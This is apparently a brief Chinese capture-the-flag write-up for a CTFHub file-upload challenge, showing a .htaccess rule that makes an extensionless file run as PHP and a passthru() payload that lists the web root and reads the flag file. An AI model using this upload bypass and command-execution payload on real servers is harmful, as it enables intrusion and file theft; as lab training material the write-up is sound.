CTFHub文件上传-.htaccess

1.常规思路：修改.htaccess文件，上传指定后缀名的一句话，菜刀连接getshell。

蚁剑未能连接成功。

2.使用 PHP passthru()函数

先写一个.htaccess文件上传

<FilesMatch "sj">  //sj随便写的，后面上传的文件没有后缀，就叫sj
 SetHandler application/x-httpd-php
</FilesMatch>

然后写的sj文件如下，上传

<?php 
#passthru("ls /var/www/html/"); //第一次只写这一行，用来找flag文件在哪里
passthru("cat /var/www/html/flag_229326633.php");//第二次是找到了flag文件之后，直接读取内容
?>

3.浏览器直接访问文件：

乱码未能正常查看flag。